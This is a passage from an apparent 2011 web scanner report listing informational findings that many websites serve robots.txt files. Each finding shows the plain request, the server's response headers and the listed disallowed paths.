User-agent: *
Disallow: /Scripts
Disallow: /DataFeedCoupons
Disallow: /Banners
Disallow: /Services

26.922. http://www.site-ym.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.site-ym.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.site-ym.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 29 Sep 2010 19:22:19 GMT
Accept-Ranges: bytes
ETag: "c6264da2b60cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:43:01 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

26.923. http://www.sitebro.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sitebro.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sitebro.net

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Tue, 03 May 2011 10:26:57 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 28
Last-Modified: Tue, 07 Sep 2010 02:46:49 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /my/

26.924. http://www.sjogrens.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sjogrens.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sjogrens.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:51:01 GMT
Server: Apache/2.0.54
Last-Modified: Tue, 14 Oct 2008 19:15:27 GMT
ETag: "4421b4c-130-703051c0"
Accept-Ranges: bytes
Content-Length: 304
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

26.925. http://www.skateparkoftampa.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.skateparkoftampa.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.skateparkoftampa.com

Response

HTTP/1.1 200 OK
Content-Length: 29
Content-Type: text/plain
Last-Modified: Fri, 07 May 2004 15:18:19 GMT
Accept-Ranges: bytes
ETag: "e1556874634c41:e70"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:10:39 GMT
Connection: close

User-agent: *
Disallow:

26.926. http://www.skillsurvey.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.skillsurvey.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.skillsurvey.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:51:21 GMT
Server: Apache/2.2.11 (Win32) PHP/5.2.9-2
Last-Modified: Wed, 27 Jan 2010 21:50:12 GMT
ETag: "1000000071d23-1cd-47e2c630ea8ec"
Accept-Ranges: bytes
Content-Length: 461
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

26.927. http://www.skullcandy.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.skullcandy.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.skullcandy.com

Response

HTTP/1.1 200 OK
Age: 1
Date: Tue, 03 May 2011 11:13:45 GMT
Connection: Keep-Alive
Via: NS-CACHE-9.2: 191
Server: nginx/0.8.53
Content-Type: text/plain
Content-Length: 85
Last-Modified: Fri, 08 Jan 2010 18:05:17 GMT
Accept-Ranges: bytes

User-agent: *
Disallow: *SID=
Disallow: *limit=
Disallow: *order=
Disallow: *dir=

26.928. http://www.sleepconnect.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sleepconnect.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sleepconnect.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Tue, 03 May 2011 10:19:48 GMT
Content-Type: text/plain
Content-Length: 257
Last-Modified: Tue, 15 Feb 2011 20:44:11 GMT
Connection: close
Accept-Ranges: bytes

User-Agent: *
Disallow: /comment/
Disallow: /flag/
Disallow: /reply/
Disallow: /track/
# _
# [ ] Malfunction. Need input!
# (o_O) /
# |_|
# __/===\__
# //| o=o |\\
# <]
...[SNIP]...

26.929. http://www.slotsjam.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.slotsjam.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.slotsjam.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:00:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Last-Modified: Mon, 24 Jan 2011 15:15:51 GMT
ETag: "5a194e7-2f1-49a991347f7c0"
Accept-Ranges: bytes
Content-Length: 753
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /forum/admin/
Disallow: /forum/images/
Disallow: /forum/includes/
Disallow: /forum/language/
Disallow: /forum/templates/
Disallow: /forum/common.php
Disallow: /forum/gro
...[SNIP]...

26.930. http://www.smartcart.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.smartcart.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.smartcart.com

Response

HTTP/1.0 200 OK
Server: Roxen/2.1.221
P3P: policyref="http://www.smartcart.com/w3c/p3p.xml",CP="DSP NOI CUR TAI OUR NOR IND STA ADM UNI INT"
Content-Type: text/plain
Content-Length: 198
Connection: keep-alive
Accept-Ranges: bytes

User-agent: *
Disallow: /*/cgi/main_path.txt
Disallow: /*/cgi/ratesys.cgi
Disallow: /*/cgi/wishlist.cgi
Disallow: /*/images/
Disallow: /*/smartadmin/
Disallow: /shoppingcart/img/
Disallow: /common/

26.931. http://www.smarthomeusa.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.smarthomeusa.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.smarthomeusa.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:40:40 GMT
Server: Apache
Last-Modified: Fri, 19 Oct 2007 13:30:27 GMT
ETag: "19e8f20-1f-43cd889a902c0"
Accept-Ranges: bytes
Content-Length: 31
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /admin/

26.932. http://www.smccme.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.smccme.edu
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.smccme.edu

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:37:05 GMT
Server: Apache
Last-Modified: Fri, 23 Apr 2010 17:34:42 GMT
ETag: "d936d-130-484ead7a57080"
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

26.933. http://www.smithandnoble.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.smithandnoble.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.smithandnoble.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:38:36 GMT
Server: IBM_HTTP_Server
Last-Modified: Mon, 31 Jan 2011 16:43:15 GMT
ETag: "1a0096-64f-1cbcaec0"
Accept-Ranges: bytes
Content-Length: 1615
Cache-Control: max-age=3600
Expires: Tue, 03 May 2011 12:38:36 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /
Disallow: /webapp/wcs/stores/servlet/DataFeedView
Disallow: /webapp/wcs/stores/servlet/CJDataFeedView
Disallow: /webapp/wcs/stores/servlet/SubmitQA
Disallow: /webapp/wcs/st
...[SNIP]...

26.934. http://www.snippetandink.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.snippetandink.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.snippetandink.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:07:05 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.snippetandink.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Cache-Control: max-age=3600
Expires: Tue, 03 May 2011 12:07:05 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

26.935. http://www.snowcrest.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.snowcrest.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.snowcrest.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:16:59 GMT
Server: Apache/2.2.17 (Fedora)
Last-Modified: Wed, 25 Oct 2006 17:52:18 GMT
ETag: "c0153-158-420a659143880"
Accept-Ranges: bytes
Content-Length: 344
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /webmail-bin/
Disallow: /mailcontrol/
Disallow: /cgi-bin/
Disallow: /_vti_pvt/
Disallow: /_vti_bin/
Disallow: /_vti_cnf/
Disallow: /_vti_log/
Disallow: /_vti_txt/
Disallow: /_p
...[SNIP]...

26.936. http://www.snowforecast.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.snowforecast.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.snowforecast.com

Response

HTTP/1.1 200 OK
Content-Length: 301
Content-Type: text/plain
Last-Modified: Mon, 03 Sep 2007 20:34:35 GMT
Accept-Ranges: bytes
ETag: "80bf8d769eec71:18aa"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:01:49 GMT
Connection: close

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /editor/
Disallow: /help/
Disallow: /images/
Disallow: /includes/
Disallow: /language/
Disallow: /m
...[SNIP]...

26.937. http://www.sobongo.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sobongo.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sobongo.com

Response

HTTP/1.1 200 OK
Server: ethProxy
Date: Tue, 03 May 2011 10:45:59 GMT
Content-Type: text/plain
Connection: close
Vary: Accept-Encoding
Last-Modified: Tue, 12 Jan 2010 14:05:54 GMT
ETag: "31623a-9a-47cf826f27480"
Accept-Ranges: bytes
Content-Length: 154
Cache-Control: max-age=600
Expires: Tue, 03 May 2011 11:01:55 GMT
Vary: Accept-Encoding

User-agent: *
Disallow: /404/
Disallow: /app/
Disallow: /includes/
Disallow: /js/
Disallow: /lib/
Disallow: /pkginfo/
Disallow: /staging/
Disallow: /var/

26.938. http://www.socializr.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.socializr.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.socializr.com

Response

HTTP/1.1 200 OK
ETag: W/"289-1300745892000"
Last-Modified: Mon, 21 Mar 2011 22:18:12 GMT
Content-Type: text/plain
Content-Length: 289
Date: Tue, 03 May 2011 11:09:06 GMT
Connection: close
Server: Commodore 64 HTTPD

User-Agent: *
Disallow: /do/
Disallow: /print

User-agent: Googlebot
Disallow: /do/
Disallow: /rss/

User-agent: Slurp
Disallow: /do/
Disallow: /rss/

User-agent: Mediapartners-Google*
Di
...[SNIP]...

26.939. http://www.solar-aid.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.solar-aid.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.solar-aid.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:48:27 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 01 Apr 2009 16:59:07 GMT
ETag: "c8cec0-e7-466813bcdccc0"
Accept-Ranges: bytes
Content-Length: 231
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /adminblog/
Disallow: /assets/
Disallow: /BKUPs/
Disallow: /blog/
Disallow: /cgi-bin/
Disallow: /lists/
Disallow: /movies/
Disallow: /mt-static/
Disallow: /scgi-bin/
Disallow:
...[SNIP]...

26.940. http://www.soundsearch.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundsearch.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.soundsearch.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:37:27 GMT
Server: Apache/2.2.3 (Debian) mod_perl/2.0.2 Perl/v5.8.8
Last-Modified: Tue, 05 Apr 2011 01:10:12 GMT
ETag: "f8642-18-89bbe500"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.941. http://www.soundspectrum.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundspectrum.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.soundspectrum.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:32:49 GMT
Server: Apache
Last-Modified: Fri, 30 Nov 2007 15:09:20 GMT
ETag: "1285c3-21-d0a12800"
Accept-Ranges: bytes
Content-Length: 33
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Morning*
Disallow: /

26.942. http://www.southdakotafishing.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.southdakotafishing.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.southdakotafishing.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:00:20 GMT
Server: Apache
Last-Modified: Tue, 25 Jan 2011 17:29:24 GMT
ETag: "56b8084-35-49aaf0ebc0500"
Accept-Ranges: bytes
Content-Length: 53
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /1prp-20/

26.943. http://www.sovintagepatterns.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sovintagepatterns.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sovintagepatterns.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 24 Mar 2011 20:33:23 GMT
Accept-Ranges: bytes
ETag: "8667cbb862eacb1:0"
Server: Microsoft-IIS/7.5
Date: Tue, 03 May 2011 10:55:17 GMT
Connection: close
Content-Length: 24

User-agent: *
Disallow:

26.944. http://www.spankwireinhd.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.spankwireinhd.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.spankwireinhd.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:48:31 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 31 Mar 2011 21:25:45 GMT
ETag: "806006e-39-49fcdefac4840"
Accept-Ranges: bytes
Content-Length: 57
ServerID: www6
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *

allow: /

disallow:/touru/?action=feedback

26.945. http://www.specialops.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.specialops.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.specialops.org

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain
Set-Cookie: ASPSESSIONIDAADBRTAA=DEJHJEEDJDKFDENDMPJGCKNM; path=/
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:01:54 GMT
Set-Cookie: apvc=saas301; Path=/
Content-Length: 863
Connection: close

User-agent: *
Disallow: /global_inc/

# When crawlers hit the engine dir they sometimes publish confusing links to site content
# in their search results so we exclude these specific engines fro
...[SNIP]...

26.946. http://www.specialtybottle.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.specialtybottle.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.specialtybottle.com

Response

HTTP/1.1 200 OK
Content-Length: 104
Content-Type: text/plain
Last-Modified: Wed, 22 Oct 2008 03:45:13 GMT
Accept-Ranges: bytes
ETag: "baba4797f833c91:aca"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:48:57 GMT
Connection: close

User-agent: *

Disallow: /admin/
Disallow: /affiliatewiz/
Disallow: /eproducts/
Disallow: /themes/

26.947. http://www.speedingupmypc.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.speedingupmypc.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.speedingupmypc.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:28:34 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 26 Jan 2011 19:11:57 GMT
ETag: "1b7a2d-2f-49ac49b52b940"
Accept-Ranges: bytes
Content-Length: 47
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
Disallow: /downloads/

26.948. http://www.speednik.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.speednik.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.speednik.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:53:13 GMT
Server: Apache/2.2.17 (Unix)
Vary: Host
Last-Modified: Tue, 24 Nov 2009 23:55:37 GMT
ETag: "17a0974-330-47926adb6d040"
Accept-Ranges: bytes
Content-Length: 816
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

#****************************************************************************
# robots.txt
# : Robots, spiders, and search engines use this file to detmine which
# content they should *not*
...[SNIP]...

26.949. http://www.speedysigns.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.speedysigns.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.speedysigns.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:54:47 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 08 Jun 2010 04:33:39 GMT
ETag: "10d955c-1a6-4887d4b180ec0"
Accept-Ranges: bytes
Content-Length: 422
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /index.php/
Disallow: /*.js$
Disallow: /*.css$
Disallow: /checkout/
Disallow: /catalogsearch/
Disallow: /app/
Disallow: /downloader/
Disallow: /js/
Disallow: /lib/
Di
...[SNIP]...

26.950. http://www.splashup.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.splashup.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.splashup.com

Response

HTTP/1.1 200 OK
Content-Length: 91
Content-Type: text/plain
Last-Modified: Tue, 23 Oct 2007 01:29:00 GMT
Accept-Ranges: bytes
ETag: "0966f161415c81:37ff"
Server: Microsoft-IIS/6.0
Date: Tue, 03 May 2011 10:08:46 GMT
Connection: close

User-agent: *
Disallow: /splashup/
Disallow: /error/
Disallow: /assets/
Disallow: /api/

26.951. http://www.sportbikes.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sportbikes.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sportbikes.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:24:21 GMT
Server: Apache
Last-Modified: Mon, 25 Dec 2006 02:21:48 GMT
Accept-Ranges: bytes
Content-Length: 286
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /editor/
Disallow: /help/
Disallow: /images/
Disallow: /includes/
Disallow: /language/
Disallow: /mambots/
D
...[SNIP]...

26.952. http://www.sportsimportsltd.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sportsimportsltd.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sportsimportsltd.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:59:02 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Cache-Control: max-age=3600, private
Expires: Tue, 03 May 2011 11:59:02 GMT
Last-Modified: Tue, 19 Apr 2011 05:04:48 GMT
Accept-Ranges: bytes
Content-Length: 344
Connection: close
Content-Type: text/plain

User-agent: *
# Cap is html
Disallow: /cgi-bin/
Disallow: /RT/
Disallow: /TG/
Disallow: /QS/
Disallow: /wgl/
Disallow: /P/
Disallow: /ymix/
Disallow: /OS/
Disallow: /cs/
Disallow: /en=
Disallow: /p/s=
...[SNIP]...

26.953. http://www.sportsinjurybulletin.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sportsinjurybulletin.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sportsinjurybulletin.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:07:59 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 21 Apr 2011 13:59:14 GMT
Accept-Ranges: bytes
Content-Length: 1661
Cache-Control: max-age=1209600
Expires: Tue, 17 May 2011 11:07:59 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Id: robots.txt,v 1.7.2.3 2008/12/10 20:24:38 drumm Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by site
...[SNIP]...

26.954. http://www.startuphire.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.startuphire.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.startuphire.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:04:38 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Wed, 26 Jan 2011 12:49:40 GMT
ETag: "2e38671-19-49abf442be100"
Accept-Ranges: bytes
Content-Length: 25
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.955. http://www.state-insurance-online.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state-insurance-online.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.state-insurance-online.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:51:25 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-2
Set-Cookie: PHPSESSID=e09d51034f123f4497041e2a9139a50d; path=/; domain=.state-insurance-online.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 266
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt
User-agent: *
Disallow: /templates
Disallow: /privacy
Disallow: /terms
Disallow: /contact
Disallow: /unsubscribe
Disallow: /usio
Disallow: /faq
Disallow: /about
Disallow: /collweb
Disallo
...[SNIP]...

26.956. http://www.state.de.us/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.de.us
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.state.de.us

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:25:02 GMT
Server: Apache/2.2.3 (Oracle)
Last-Modified: Fri, 16 Jul 2010 13:25:29 GMT
ETag: "65440c-1a-270c4440"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

26.957. http://www.statejournal.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.statejournal.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.statejournal.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 19 Nov 2010 15:00:14 GMT
Accept-Ranges: bytes
ETag: "96f36678fa87cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:34:48 GMT
Connection: close
Content-Length: 396

User-agent: *
Disallow: /admin/
Disallow: /ads/
Disallow: /login.cfm
Allow: /

User-agent: Googlebot
Disallow: /mobile/
Disallow: /admin/
Disallow: /ads/
Disallow: /login.cfm
Allow: /

Us
...[SNIP]...

26.958. http://www.steampunkworkshop.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.steampunkworkshop.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.steampunkworkshop.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:29:55 GMT
Server: Apache
Last-Modified: Mon, 06 Sep 2010 10:37:16 GMT
ETag: "a1e46b7-624-48f94dd34cf00"
Accept-Ranges: bytes
Content-Length: 1572
Cache-Control: max-age=1209600
Expires: Tue, 17 May 2011 10:29:55 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

26.959. http://www.stencilsearch.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stencilsearch.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.stencilsearch.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:35:22 GMT
Server: Apache
Last-Modified: Wed, 31 Mar 2010 12:28:18 GMT
Accept-Ranges: bytes
Content-Length: 2311
Connection: close
Content-Type: text/plain

User-agent: msnbot
User-agent: Slurp
Crawl-delay: 500
Disallow: /blog/wp-login.php
Disallow: /images/
Disallow: /sda/
Disallow: /pdf/
Disallow: /php/
Disallow: /forum/Themes/
Disallow: /artists/yellow
...[SNIP]...

26.960. http://www.stevespages.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stevespages.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.stevespages.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:17:34 GMT
Server: Apache
Last-Modified: Tue, 29 Dec 2009 11:53:06 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 58
Connection: close
Content-Type: text/plain

User-agent: webcrawler
Disallow:

User-agent: *
Disallow:

26.961. http://www.stjohnprovidence.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stjohnprovidence.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.stjohnprovidence.org

Response

HTTP/1.1 200 OK
Content-Length: 23
Content-Type: text/plain
Last-Modified: Fri, 11 Aug 2006 20:29:41 GMT
Accept-Ranges: bytes
ETag: "deb6e4df84bdc61:355"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:34:11 GMT
